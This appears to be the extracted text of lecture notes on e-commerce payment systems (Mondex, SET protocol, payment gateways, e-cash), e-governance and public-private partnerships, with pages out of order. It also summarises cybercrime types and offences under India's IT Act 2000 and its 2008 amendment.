o individual transaction data is not collected by banks - Mondex is an unaudited
system
PREPARED BY ARUN PRATAP SINGH 41
41
The design of a Mondex smart card allows end users to transfer funds electronically onto the card
and then utilize the Mondex smart card to make purchases up to the total cash value held on the
card Mondex smart cards provide an electronicpayment system using all the capabilities
associated with smart card technology The Mondex smart card can be a convenient alternative
to cash
Although the design was five years old at the time the Mondex smart card was actually launched
in 1995 ndash two years before MasterCard assumed control of the technology
The banks that currently support the Mondex smart card include National Bank of Canada
Scotiabank Canada Trust Bank of Montreal Le Mouvement des caisses Desjardins and Toronto
Dominion Bank With so many respected lending institutions banking on the idea the Mondex
smart card is worth a closer look
The Mondex smart card has the ability to make card-to-card transfers which is not possible with
standard credit or debit cards When you use a creditdebit card to make a purchase
communication is required between the bank and your card However Mondex cards contain an
embedded microprocessor with sophisticated encryption methods and tamper-proof hardware
designed to protect them from hackers The ability of the Mondex smart card to do offline
transactions means they are less dependent on expensive network infrastructure reducing
transaction costs Offline transactions may seem anonymous however they actually are recorded
in the digital memory of the cardrsquos microprocessor and remain retrievable the next time the card
is used at an ATM or as soon as the retailer uploads transaction data to the bank computer
A significant disadvantage with Mondex is that transactions arenrsquot truly anonymous Unlike pre-
paid phone cards which are also based on smart card technology you canrsquot purchase a Mondex
card without revealing your identity Each card has a unique identification number through which
owners can easily be identified Mondex smart cards have not been as successful as originally
predicted Customers have not been especially satisfied with the card and its services Unlike a
credit or debit card your money may be lost forever if you should lose a Mondex smart card
Losing a Mondex card is just like losing a wallet full of cash With a credit card yoursquore protected
against any loss exceeding $50 dollars This protection is not currently available with a Mondex
smart card
According to the Mondex smart card system it is fully auditable There is a log of the time date
amount and participants of each transaction which hampers the privacy of users Technically
however Mondex canrsquot claim to be a fully auditable system After a number of transactions
overflow can occur as a result of limited memory in the Mondex smart-cards This means that
PREPARED BY ARUN PRATAP SINGH 42
42
significant data may be lost before Mondex is able to retrieve it Critics say this loss of data is a
critical design flaw making it difficult for Mondex to reliably detect fraud
While Mondex smart cards are not a hundred percent secure they do possess the ability to tolerate
minor fraud loss
Mondex believes their electronic payment system is secure They are convinced that critics who
have voice concern over security issues are mistaken and misinformed Perhaps the use of a
Mondex smart card depends on a personal level of trust
E-GOVERNANCE
Although the term lsquoe-Governancersquo has gained currency in recent years there is no standard
definition of this term Different governments and organizations define this term to suit their own
aims and objectives Sometimes the term lsquoe-governmentrsquo is also used instead of lsquoe-
Governancersquo
Several dimensions and factors influence the definition of e-governance or electronic
governance The word ldquoelectronicrdquo in the term e-governance implies technology driven
governance E-governance is the application of information and communication technology (ICT)
for delivering government services exchange of information communication transactions
integration of various stand-alone systems and services between government-to-customer (G2C)
government-to-business (G2B) government-to-government (G2G) as well as back office
processes and interactions within the entire government framework Through e-governance
government services will be made available to citizens in a convenient efficient and transparent
manner The three main target groups that can be distinguished in governance concepts are
government citizens and businessesinterest groups In e-governance there are no distinct
boundaries
Generally four basic models are available ndash government-to-citizen (customer) government-to-
employees government-to-government andgovernment-to-business
Difference between E-Government and E-Governance ndash
Both the terms are treated to be the same however there is some difference between the two
E-government is the use of the ICTs in public administration - combined with organizational
change and new skills - to improve public services and democratic processes and to strengthen
support to public The problem in this definition to be congruence definition of e-governance is
that there is no provision for governance of ICTs As a matter of fact the governance of ICTs
requires most probably a substantial increase in regulation and policy-making capabilities with
all the expertise and opinion-shaping processes among the various social stakeholders of these
PREPARED BY ARUN PRATAP SINGH 43
43
concerns So the perspective of the e-governance is the use of the technologies that both help
governing and have to be governed The Public-Private Partnership (PPP) based e-governance
projects are hugely successful in India United Telecoms Limited known as UTL is a major player
in India on PPP based e-governance projects Each project had mammoth state wide area
networks in these states
E-governance is the future many countries are looking forward to for a corruption-free
government E-government is one-way communication protocol whereas e-governance is two-
way communication protocol The essence of e-governance is to reach the beneficiary and ensure
that the services intended to reach the desired individual has been met with There should be an
auto-response to support the essence of e-governance whereby the Government realizes the
efficacy of its governance E-governance is by the governed for the governed and of the
governed
Establishing the identity of the end beneficiary is a challenge in all citizen-centric services
Statistical information published by governments and world bodies does not always reveal the
facts The best form of e-governance cuts down on unwanted interference of too many layers
while delivering governmental services It depends on good infrastructural setup with the support
of local processes and parameters for governments to reach their citizens or end
beneficiaries Budget for planning development and growth can be derived from well laid out e-
governance systems
Why e-Governance
E-Government can transform citizen service provide access to information to empower citizens
enable their participation in government and enhance citizen economic and social opportunities
so that they can make better lives for themselves and for the next generation
BASIC ARCHITECTURE
PREPARED BY ARUN PRATAP SINGH 44
44
A suggested architecture for e-Governance is shown in the diagram where it is illustrated that
Applications from various departments can be integrated together so as to be accessed by any
terminal or computer from any other department or anywhere through the network This is
because of the characteristics of CORBA - it is location transparent language independent
implementation independent architecture and Operating System independent The applications
connected through CORBAIIOP could be legacy applications wrapped around to suit CORBA
specifications or any new Web application or could be even a data base environment using
Oracle etc Seamless interconnection and thereby effective utility of the entire system of e-
Governance is possible if the middleware is designed to have the necessary services like
Transactions Data Base Management Messaging and Naming
Regarding security aspects CORBA Security standard is built around existing security
specifications such as Distributed Computing Environment (DCE) the Kerberos Protocol and
Generic Security Service (GSS) API While these technologies are heavily weighted Public Key
Security with Secured Socket Layer (SSL) is popular with Internet based transactions
Types of Interactions in e-Governance
e-Governance facilitates interaction between different stake holders in governance These interactions may be described as follows
G2G (Government to Government)
In this case Information and Communications Technology is used not only to restructure the governmental processes involved in the functioning of government entities but also to increase the flow of information and services within and between different entities This kind of interaction is only within the sphere of government and can be both horizontal ie between different government agencies as well as between different functional areas within an organization or vertical ie between national provincial and local government agencies as well as between different levels within an organization The primary objective is to increase efficiency performance and output
PREPARED BY ARUN PRATAP SINGH 45
45
G2C (Government to Citizens)
In this case an interface is created between the government and citizens which enables the citizens to benefit from efficient delivery of a large range of public services This expands the availability and accessibility of public services on the one hand and improves the quality of services on the other It gives citizens the choice of when to interact with the government (eg 24 hours a day 7 days a week) from where to interact with the government (eg service centre unattended kiosk or from onersquos homeworkplace) and how to interact with the government (eg through internet fax telephone email face-to-face etc) The primary purpose is to make government citizen-friendly
G2B (Government to Business)
Here e-Governance tools are used to aid the business community ndash providers of goods and services ndash to seamlessly interact with the government The objective is to cut red tape save time reduce operational costs and to create a more transparent business environment when dealing with the government The G2Binitiatives can be transactional such as in licensing permits procurement and revenue collection They can also be promotional and facilitative such as in trade tourism and investment These measures help to provide a congenial environment to businesses to enable them to perform more efficiently
G2E (Government to Employees) Government is by far the biggest employer and like any organization it has to interact with
its employees on a regular basis This interaction is a two-way process between the
organization and the employee Use of ICT tools helps in making these interactions fast
and efficient on the one hand and increase satisfaction levels of employees on the other
Difference between G2B and B2G
Government to business (G2B)- Refers to the conducting of transactions between
government bodies and business via internet
Business to government (B2G)- Professional affairs conducted between companies and
regional municipal or federal governing bodies B2G typically encompasses the
determination and evaluation of proposal and completion of contract
PUBLIC PRIVATE PARTNERSHIPS
bull Agreement between Government and the Private Sector for the Provision of a Public
Good or Service by the Latter
bull Generally but not always involving
ndash Long Term Contracts
ndash User Charges andor Payments flowing between the Parties
ndash Shared Investments but Mainly Private
PREPARED BY ARUN PRATAP SINGH 46
46
ndash Risk Sharing by the Parties
bull Must be a Partnership
A public-private partnership exists when public sector agencies (federal state or local) join with
private sector entities (companies foundations academic institutions or citizens) and enter into a
business relationship to attain a commonly shared goal that also achieves objectives of the
individual partners
Why do them
bull Fiscal Head Room
bull As a Way of Financing the Project
bull Separate Policy amp Regulation from Operations
PREPARED BY ARUN PRATAP SINGH 47
47
bull Make the Good or Service Available
bull Pay for Performance and Output
bull Introduce Competition ndash For and In the Market
PREPARED BY ARUN PRATAP SINGH 48
48
The Need to Set the Right Priorities ndash
Four Basic Dimensions of P3
Although each is unique all P3rsquos include four basic characteristics
Shared goals
Shared resources (time money expertise people)
Shared risks
Shared benefits
Benefits
Expedited project completion
Project cost savings
Improved quality
Use of private resources
Access to new sources of private capital
Two Major Steps
PREPARED BY ARUN PRATAP SINGH 49
49
Crafting the Partnership
Implementing the Partnership
Project Management -
Six Distinct Phases
Genesis
Whatrsquos the need
Whatrsquos driving the need rationale
Facility non-compliance natural disaster budget deficit
Is there a need for a PublicPrivate Partnership
PREPARED BY ARUN PRATAP SINGH 50
50
Preliminary Project Definition
Feasibility
Is a PublicPrivate Partnership feasible not only financially but practically Can it be
done
Market Research
EconomicFinancial Analysis
Program Budget and Schedule
Risk Analysis
Plan and Test
Final project definition
What is the best way to complete the project
Has the plan been thoroughly tested to assess market demand public and stakeholder
feedback and economics
Master ScheduleBudget
Political Climate
Any potential ldquofatal flawsrdquo that could derail the project
Procurement and Contracting
How do you choose and contract with the best-value private partner
Whatrsquos the best delivery method
Design-Bid-Build
Design-Build
Finance-Design-Build
What do current statutes allow
Procurement Approach
Sole Source RFP Low Bid
Risk Allocation between Public and private Partners
Structuring of ContractRisks and Rewards
PREPARED BY ARUN PRATAP SINGH 51
51
Implement
Environmental
Design
Permitting
Construction
Commissioning and Administration
Operate
Startup
Monitoring
Assessment
Enhancement
Contract Modifications
Contract Renegotiations
READINESS IN E-GOVERNANCE
A high level of readiness to develop and implement e-government services is a prerequisite for a high--performing and innovative public sector that delivers integrated services making life easier for citizens and businesses E-government readiness is therefore a -significant indicator of whether a country is prepared to harvest efficiencies gained from ICT-enabled public administrations
The UNs e-government readiness index is a combined indicator of the supply of potential demand for and maturity of e-government services OECD member countries exhibit a high capacity to develop and implement e-government services This is generally characterized by an extensive broadband infrastructure a repository of electronic information on government laws and policies including links to archived information and downloadable forms and a high level of comfort with ICT by citizens and businesses Countries with the highest readiness index tend to also have a large amount of transactional and e-commerce features on their government websites As noted by the UN in its 2008 e-government survey the Scandinavian countries with the top three scores on the readiness index all generally share similar e-government environments (eg the accessibility and penetration of the electronic infrastructure) and strategies (eg the online provision of services) Each country has two main government websites one that is informative and another that is a gateway for e-government services In addition citizens and businesses are able to access many services and complete many transactions online However similar levels of e-government readiness can also result from different strategic approaches
Internet access is a prerequisite for citizens and businesses to use e-government services and thus a leading indicator of countries readiness to harness the potential efficiencies of ICT Broadband penetration has increased dramatically in most OECD member countries in the past
PREPARED BY ARUN PRATAP SINGH 52
52
five years as countries have made significant investments in their telecommunications infrastructure
SECURITY ISSUES IN E-GOVERNANCE
1 INTRODUCTION The term e-Government is defined by the Organization for Economic Cooperation and Development (OECD) as the use of new information and communication technologies (ICTs) by governments as applied to the full range of government functions In particular the networking potential offered by the Internet and related technologies have the potential to transform the structures and operation of government
The effective management of information security is a key factor as willingness of the different users (citizens and other parties) to use e-Government services will heavily depend on the trust they have on the data security of this service
2 INFORMATION SECURITY A central challenge of e-Government service is how the new technology can be used not only to increase efficiency for public administration but also to strengthen confidence in privacy measures by creating mutual transparency between public administration and citizens
The process approach for information security management system ISMS encourages its users to emphasize the importance of
understanding an organizationrsquos information security requirements and the need to establish policy and objectives for information security
implementing and operating controls to manage an organizations information security risks in the context of the organizationrsquos overall business risks
monitoring and reviewing the performance and effectiveness of the ISMS continual improvement based on objective measurement
Data security requires a set of security requirements Authentication capability to identify who is using the services (person or software program) Processes of verifying that you are who you say you are Authorization capability to give rights access to resources Process to verify someone have the rights to do what she is trying to do Confidentiality capability to prevent unauthorized access to information Integrity capability to prevent information from unauthorized modification and ensuring that information can be relied upon and is accurate and complete Traceability capability to chronologically interrelate any transaction to a person or system that performed the action in a way that is verifiable Non-repudiation capability to prevent the intervening person or system in an event or action to denying or challenging their participation on the event
Example of organizational and technical measures to prevent unauthorized access and processing are shown
Protecting premises equipment and systems software including input-output units
PREPARED BY ARUN PRATAP SINGH 53
53
Protecting software applications used to process personal data Preventing unauthorized access to personal data during transmission thereof including
transmission via telecommunication means and networks Ensuring effective methods of blocking destruction erasure or anonymization of
personal data Enabling subsequent determination of when individual personal data were entered into a
filing system used or otherwise processed and the person responsible for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data
Despite trusted security and privacy measures constitutes a crucial success factor for e-Government that has not been yet addressed as UN 2012 Survey shows only 20 of national portals clearly indicate the presence of security features Europe is leading with 44 countries displaying secure links on their national websites but survey do not consider regional and local websites and neither the many decentralized public organization web portals
3 INFORMATION SECURITY THREATS Services provided by e-Government to citizens enterprise public officer government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats Detailed examples of cyber attacks using techniques like packet sniffer probe malware internet infrastructure attack denial of services attack remote to local attack and user to root attack The successful adoption of an ISMS is important to protect information assets allowing an organization to
Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks selecting and applying applicable controls and measuring and improving their effectiveness
Continually improve its control environment Effectively achieve legal and regulatory compliance
There are simple and well-known web application vulnerabilities that could be avoided but e- Government webs are still vulnerable A research work found 816 e-Government web sites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection SQL injection attack can compromise data integrity while XSS is a vulnerability which attackers may exploit to steal users information
Specific security measures like firewalls intrusion detection software encryption and secure networks must be defined designed and implemented for government agencies to provide the appropriate levels of security But information security must also take into consideration the people and processes that rely on the systems Employees with daily access to e-Government systems must be trained on cybersecurity and this aspect must become part of their job A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies
PREPARED BY ARUN PRATAP SINGH 54
54
CYBER CRIME AND LAWS
The expression lsquoCrimersquo is defined as an act which subjects the doer to legal punishment
or any offence against morality social order or any unjust or shameful act The ldquoOffence
is defined in the Code of Criminal Procedure to mean as an act or omission made
punishable by any law for the time being in force
Cyber Crime is emerging as a serious threat World wide governments police
departments and intelligence units have started to react
Cyber Crime is a term used to broadly describe criminal activity in which computers or
computer networks are a tool a target or a place of criminal activity and include everything
from electronic cracking to denial of service attacks It is also used to include traditional
crimes in which computers or networks are used to enable the illicit activity
Computer crime mainly consists of unauthorized access to computer systems data
alteration data destruction theft of intellectual property Cyber crime in the context of
national security may involve hacking traditional espionage or information warfare and
related activities
Pornography Threatening Email Assuming someones Identity Sexual Harassment
Defamation Spam and Phishing are some examples where computers are used to commit
crime whereas Viruses Worms and Industrial Espionage Software Piracy and Hacking
are examples where computers become target of crime
Cyber Crime Variants
Hacking
Hacking is a crime which entails cracking systems and gaining unauthorized access to the data
stored in them Hacking had witnessed a 37 per cent increase this year
Cyber Squatting
Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune
This is an issue that has not been tackled in IT ACT 2000
Phishing is just one of the many frauds on the Internet trying to fool people into parting with their
money Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions
requesting them to enter their Username Password or other personal information to access their
Account for some reason
The fraudster then has access to the customers online bank account and to the funds contained
in that account
Cyber Stalking is use of the Internet or other electronic means to stalk someone This term is
used interchangeably with online harassment and online abuse Stalking generally involves
harassing or threatening behaviour that an individual engages in repeatedly such as following a
person appearing at a persons home or place of business making harassing phone calls leaving
written messages or objects or vandalizing a persons property
PREPARED BY ARUN PRATAP SINGH 55
55
Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access
to private personal and financial information from the public for the purpose of financial reward
The term is a combination of ldquoVoice and phishing Vishing exploits the publics trust in landline
telephone services
Vishing is typically used to steal credit card numbers or other information used in identity theft
schemes from individuals
A rapidly growing online user base
121 Million Internet Users
65 Million Active Internet Users up by 28 from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages
PREPARED BY ARUN PRATAP SINGH 56
56
CYBER LAW
(1) Whoever with the Intent to cause or knowing that he is likely to cause Wrongful Loss or
Damage to the public or any person Destroys or Deletes or Alters any Information
Residing in a Computer Resource or diminishes its value or utility or affects it injuriously
by any means commits hack
(2) Whoever commits hacking shall be punished with imprisonment up to three years or with
fine which may extend up to two lakh rupees or with both
Whoever without permission of the owner of the computer
Secures Access
Downloads Copies or extracts any data computer database or any
information
Introduce or causes to be introduce any Virus or Contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of
another person by Tampering with or Manipulating any Computer
Computer System or Computer Network
Shall be liable to pay damages by way of compensation not exceeding one crore rupees
to the person so affected
Section ndash 43
Destroys Deletes or Alters any Information residing in a computer resource or diminishes its
value or utility or affects it injuriously by any means
Steals conceals destroys or alters or causes any person to steal conceal destroy or alter any
computer source code used for a computer resource with an intention to cause damage
ldquoIf any person dishonestly or fraudulently does any act referred to in section 43 he shall be
punishable with imprisonment for a term which may extend to two three years or with fine which
may extend to five lakh rupees or with bothrdquo [S66]
S66A - Punishment for sending offensive messages through communication service etc
Any person who sends by means of a computer resource or a communication device
Any information that is grossly offensive or has menacing character or
PREPARED BY ARUN PRATAP SINGH 57
57
Any information which he knows to be false but for the purpose of causing annoyance
inconvenience danger obstruction insult injury criminal intimidation enmity hatred or
ill will persistently makes by making use of such computer resource or a communication
device
Any electronic mail or electronic mail message for the purpose of causing annoyance or
inconvenience or to deceive or to mislead the addressee or recipient about the origin of
such messages
Shall be punishable with imprisonment for a term which may extend to three years and with
fine
S 66C - Punishment for identity theft
ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or
any other unique identification feature of any other person shall be punished with imprisonment
of either description for a term which may extend to three years and shall also be liable to fine
which may extend to rupees one lakhrdquo
S 66D - Punishment for cheating by personation by using computer resource
ldquoWhoever by means of any communication device or computer resource cheats by
personation shall be punished with imprisonment of either description for a term which may
extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo
S 66E - Punishment for violation of privacy
ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private
area of any person without his or her consent under circumstances violating the privacy of that
person shall be punished with imprisonment which may extend to three years or with fine not
exceeding two lakh rupees or with bothrdquo
S 67 A - Punishment for publishing or transmitting of material containing sexually
explicit act etc in electronic form
ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form
any material which contains sexually explicit act or conduct shall be punished on first conviction
with imprisonment of either description for a term which may extend to five years and with fine
which may extend to ten lakh rupeesrdquo
S 67 C - Preservation and Retention of information by intermediaries
ldquo(1) Intermediary shall preserve and retain such information as may be specified for such
duration and in such manner and format as the Central Government may prescribe
(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub section
(1) shall be punished with an imprisonment for a term which may extend to three years and shall
also be liable to finerdquo
PREPARED BY ARUN PRATAP SINGH 58
58
IT ACT
The Information Technology Act 2000 (also known as ITA-2000 or the IT Act) is an Act of
the Indian Parliament (No 21 of 2000) notified on October 17 2000 This act is being opposed
by Save Your Voice campaign and other civil society organizations in India User-review and
consumer social networking site MouthShutcom has filed a writ petition in the Supreme Court of
India to repeal and nullify parts of IT Act 2000
The United Nations General Assembly by resolution ARES51162 dated the 30 January 1997
has adopted the Model Law on Electronic Commerce adopted by the United Nations Commission
on International Trade Law This is referred to as the UNCITRAL Model Law on E-Commerce
Following the UN Resolution India passed the Information Technology Act 2000 in May 2000
which came into force on October 17 2000 The Information Technology Act 2000 has been
substantially amended through the Information Technology (Amendment) Act 2008 which was
passed by the two houses of the Indian Parliament on December 23 and 24 2008 It got the
Presidential assent on February 5 2009 and came into force on October 27 2009 The amended
Act has provided additional focus on information security It has added several new sections on
offences including cyber terrorism and data protection A set of Rules related to sensitive personal
information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was
notified in April 2011
Provisions ndash
Information technology Act 2000 consisted of 94 sections segregated into 13 chapters Four
schedules form part of the Act In the 2008 version of the Act there are 124 sections (excluding
5 sections that have been omitted from the earlier version) and 14 chapters Schedule I and II
have been replaced Schedules III and IV are deleted
Information Technology Act 2000 addressed the following issues
1 Legal recognition of electronic documents
2 Legal Recognition of digital signatures
3 Offenses and contraventions
4 Justice dispensation systems for cybercrimes
Offences ndash
Section Offence Punishment
65 Tampering with computer source documents - Intentional
concealment destruction or alteration of source code when the
Imprisonment up to
three years orand
PREPARED BY ARUN PRATAP SINGH 59
59
computer source code is required to be kept or maintained by
law for the time being in force
with fine up to 2 lakh
rupees
66 Hacking
Imprisonment up to
three years orand
with fine up to 5 lakh
rupees
66-A
Sending offensive message through electronic means -
Sending any information through an electronic message that is
grossly offensive or has menacing character and might cause
insult injury criminal intimidation enmity hatred or ill will etc
or sending such mail intended to deceive or to mislead the
addressee or recipient about the origin of such messages
Imprisonment up to
three years and with
fine
Criticisms-
The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December
2008 with no discussion in the House Some of the cyber law observers have criticized the
amendments on the ground of lack of legal and procedural safeguards to prevent violation of civil
liberties of Indians There have also been appreciation about the amendments from many
observers because it addresses the issue of Cyber Security
Section 69 empowers the Central GovernmentState Government its authorized agency to
intercept monitor or decrypt any information generated transmitted received or stored in any
computer resource if it is necessary or expedient so to do in the interest of the sovereignty or
integrity of India defence of India security of the State friendly relations with foreign States or
public order or for preventing incitement to the commission of any cognizable offence or for
investigation of any offence They can also secure assistance from computer personnel in
decrypting data (see mandatory decryption) under penalty of imprisonment
Section 66A is widely criticized It has led to numerous abuses reported by the press Section 66A
has also been criticised and challenged in Lucknow and Madras High Courts for its constitutional
validity Based on Section 66A Bombay High Court has held that creating a website and storing
false information on it can entail cyber crime
PREPARED BY ARUN PRATAP SINGH 5
5
Smart Cards
A smart card is any pocket-sized card with embedded integrated circuits which can
process data
This implies that it can receive input which is processed and delivered as an output
Smart card Processing
PREPARED BY ARUN PRATAP SINGH 6
6
Smart Card Applications ndash
Ticketless travel
Seoul bus system 4M cards 1B transactions since 1996
Planned the SF Bay Area system
Authentication ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Credit cards
It is a Plastic Card having a Magnetic Number and code on it
It has Some fixed amount to spend
Customer has to repay the spend amount after sometime
PREPARED BY ARUN PRATAP SINGH 7
7
Processing a Credit cards payment ndash
Risk in using Credit cards -
Operational Risk
Credit Risk
Legal Risk
Secure Electronic Transaction (SET) Protocol
Jointly designed by MasterCard and Visa with backing of Microsoft Netscape IBM
GTE SAIC and others
Designed to provide security for card payments as they travel on the Internet
Contrasted with Secure Socket Layers (SSL) protocol SET validates consumers
and merchants in addition to providing secure transmission
SET specification
Uses public key cryptography and digital certificates for validating both
consumers and merchants
PREPARED BY ARUN PRATAP SINGH 8
8
Provides privacy data integrity user and merchant authentication and consumer
nonrepudiation
The SET Protocol
What Is Payment Gateways
A payment gateway is an e-commerce application service provider service that
authorizes payments for e-businesses online Shopping etc
PREPARED BY ARUN PRATAP SINGH 9
9
Payment gateway protects credit cards details encrypting sensitive information such
as credit card numbers to ensure that information passes securely between the
customer and the merchant and also between merchant and payment processor
How It works
Payments In India
Going the e-way
e-PAYMENT SYSTEM IN INDIA
bull Ever-increasing technology changes
bull Growing Internet access and mobile subscriber base
bull Rising consumer confidence
bull Convenient deliverypayment models
bull India has been one of the fastest growing country for payment cards in the Asia-Pacific
region
bull India currently has approximately 130 million cards (both debit and credit) in circulation
PREPARED BY ARUN PRATAP SINGH 10
10
GROWTH IN e-PAYMENT SYSTEM
REGULATION-
The Reserve Bank of India (RBI) has been supportive in the development of electronic
payments
In this direction the ldquoPayments and Settlement System Actrdquo was enacted
Apart from being supporting the RBI has also initiated various programs to encourage e-
payments
CHANNELS OF PAYMENT-
Indian banks have put in place various channels of electronic payments in place to
encourage customers to adopt the electronic mode
Channels like the Internet mobile ATMs and drop boxes are some of the most
frequently used channels apart from bank branches
MARKET MAPPING-
E-payments processing market has two major players namely
Tech Process and Bill Desk which is a pure play electronic transaction processing company
The Indian Payment System Is Transforming From Paper Mode To Electronic Mode
Two main reasons for such shift are-
PREPARED BY ARUN PRATAP SINGH 11
11
1 The regulator has mandated routing all high-value transactions electronically to minimize
movement of money and risk
2 At the retail end customers are realizing the efficiency of electronic payments
SHIFTS IN THE PAYMENT SYSTEM
TECHNOLOGICAL ADVANCEMENT IN e-PAYMENT
bull Electronic Clearing Service (Credit and Debit)
bull National Electronic Fund Transfer (NEFT)
THE RULING PLASTIC MONEY
Credit cards
Debit cards
ATM Cards
PayPal
PayPal is a global e-commerce business allowing payments and money transfers to be made
through the Internet Online money transfers serve as electronic alternatives to paying with
traditional paper methods such as checks and money orders It is subject to the US economic
sanction list and other rules and interventions required by US laws or government PayPal is an
acquirer performing payment processing for online vendors auction sites and other commercial
PREPARED BY ARUN PRATAP SINGH 12
12
users for which it charges a fee It may also charge a fee for receiving money proportional to the
amount received The fees depend on the currency used the payment option used the country
of the sender the country of the recipient the amount sent and the recipients account type In
addition eBay purchases made by credit card through PayPal may incur extra fees if the buyer
and seller use different currencies On October 3 2002 PayPal became a wholly owned
subsidiary of eBay Its corporate headquarters are in San Jose California United States at eBays
North First Street satellite office campus The company also has significant operations in Omaha
Scottsdale Charlotte and Austin in the United States Chennai in India Dublin in Ireland
Kleinmachnow in Germany and Tel Aviv in Israel From July 2007 PayPal has operated across
the European Union as a Luxembourg-based bank
Google Wallet
Google Wallet was launched in 2011 serving a similar function as PayPal to facilitate payments
and transfer money online It also features highly robust security and additional features such as
the ability to send payments as attachments via email
PREPARED BY ARUN PRATAP SINGH 13
13
CHARACTERISTICS OF PAYMENT SYSTEM
There is no paper involved so electronic payments can be effected directly from home or office
Fast efficient safe secure and generally less costly than paper-based alternatives eg cheques
Electronic payments are fully traceable
In Ireland the clearing time for standard electronic payments is next day value for interbank
transfers subject to the payment instruction being received ahead of lsquoshut-offrsquo times which can
vary from bank to bank Payment instructions received after the lsquoshut-offrsquo time will be processed
one working day later
Most banks offer same day value for payments made to other accounts held in that same bank
Many banks offer same day money transfer inter-bank services for large value payments
Unlike cheques electronic payments donrsquot lsquobouncersquo ndash as payments will not be effected unless the
funds are available in the first place
PREPARED BY ARUN PRATAP SINGH 14
14
Features of Payment Methods
bull Anonymity whether the payment method is anonymous
bull Security whether the payment method is secure
bull Overhead cost the overhead cost of processing a payment
bull Transferability whether a payment can be carried out without the involvement of a
third party
bull Divisibility whether a payment can be divided into arbitrary small payments whose
sum is equal to the original payment
bull Acceptability whether the payment method is supported globally
4C PAYMENTS METHODS
To make the e-commerce system functional we also need to incorporate payment
functions into the system
In the physical world there are 4 types of payment methods
bull Cash
bull Credit card
bull Check
bull Creditdebit (Fund Transfer)
bull Payment method should be
ndash Very secure
ndash Having Low overhead cost
ndash Transferable
ndash Acceptable anywhere
ndash Divisible
ndash Anonymous
Comparison of the 4C payment methods
PREPARED BY ARUN PRATAP SINGH 15
15
SET PROTOCOL FOR CREDIT CARD PAYMENT
bull The credit card is one of the most commonly used payment methods in e-commerce in particular B2C e-commerce
bull Before the introduction SET protocol secure credit card payment was usually carried out over an SSL connection
Advantage of SSL
bull It ensures the secure transmission of credit card information over the internet
Disadvantage of SSL
bull It is not a complete credit card payment method
bull For example it cannot support on-line credit card authorization
SET is specially developed to provide secure credit card payment over the internet
It is now widely supported by major credit card companies including Visa and
MasterCard
PREPARED BY ARUN PRATAP SINGH 16
16
bull SET aims at satisfying the following security requirements in the context of credit card
payment
ndash Confidentiality - Sensitive messages are encrypted so that they are kept
confidential
ndash Integrity - Nearly all messages are digitally signed to ensure content integrity
ndash Authentication - Authentication is performed through a public key infrastructure
SET network architecture
Merchant a seller which is connected to an acquirer
Cardholder a registered holder of the credit card who is a buyer
Issuer the bank that issues the credit card to a cardholder
Acquirer the bank that serves as an ldquoagentrdquo to link a merchant to multiple issuers
bull A merchant can process various credit cards through a single acquirer
bull Payment Gateway This is typically connected to the acquirer
ndash The payment gateway is situated between the SET system and the financial
network of the current credit card system for processing the credit card payment
SET Digital Certificate System
PREPARED BY ARUN PRATAP SINGH 17
17
Dual signature generation and verification ndash
bull In the physical credit card system
ndash the Payment Instructions (PI) including the cardholderrsquos credit card number and
signature are not kept confidential
ndash data integrity can basically be ensured by using printed receipts
ndash cardholderrsquos authentication relies on simple signature checking only
bull In an electronic credit card system
ndash the Order Information (OI) and PI can be digitally signed to ensure data integrity
ndash the sensitive credit card information may still be disclosed to other people
bull SET introduces a novel method called the dual signature (DS) to ensure data integrity
while protecting the sensitive information
PREPARED BY ARUN PRATAP SINGH 18
18
How the merchant and the payment gateway can verify the DS
bull The merchant is provided with OI H[PI] and DS
bull The dual signature can be verified as follows
Step 1 The merchant first finds
H[ H[PI] || H[OI] ]
Step 2 He then decrypts the digital signature with the cardholderrsquos public signature key as
follows
DRSA[ DS | keypublic_sign cardholder ]
Where
keypublic_sign cardholder public signature key of the cardholder
PREPARED BY ARUN PRATAP SINGH 19
19
Step 3 Finally he compares the two terms H[H[PI] || H[OI]] and
DRSA[DS | keypublic_signcardholder ]
They should be the same if the transmitted DS has not been changed otherwise the order is
not valid
The payment gateway is provided with PI H[OI] and DS
By using the dual signature method each cardholder can link OI and PI while releasing
only the necessary information to the relevant party
If either the OI or PI is changed the dual signature will no longer be valid
DIGITAL ENVELOPE ndash
PREPARED BY ARUN PRATAP SINGH 20
20
SET PROTOCOL ndash
SET protocol has four phases initiation purchase authorization and capture
First the cardholder sends a purchase initiation request to the merchant for initializing
the payment
Then the merchant returns a response message to the cardholder
In the second phase the cardholder sends the purchase order together with the
payment instruction to the merchant
In the third phase the merchant obtains the authorization from the issuer via the
payment gateway
Finally the merchant requests a money transfer to its account
E-CASH
Electronic money is paperless cash This money is either stored on a card itself or in an account
associated with the card
The most common examples are transit cards meal plans and PayPal E-Cash can also mean
any kind of electronic payment
Electronic payment systems come in many forms including virtual cheques ATM cards credit
cards and stored value cards The usual security features for such systems are privacy
authenticity and no repudiation
There are four major components in an electronic cash system
Issuers
Customers
Merchants or traders
Regulators
Issuers can be banks or non-bank institutions
PREPARED BY ARUN PRATAP SINGH 21
21
customers are referred to users who spend E-Cash
Merchants and traders are vendors who receive E-Cash
regulators are defined as related authorities or state tax agencies
For an E-Cash transaction to occur we need to go through at least three stages
Account Setup Customers will need to obtain E-Cash accounts through certain issuers
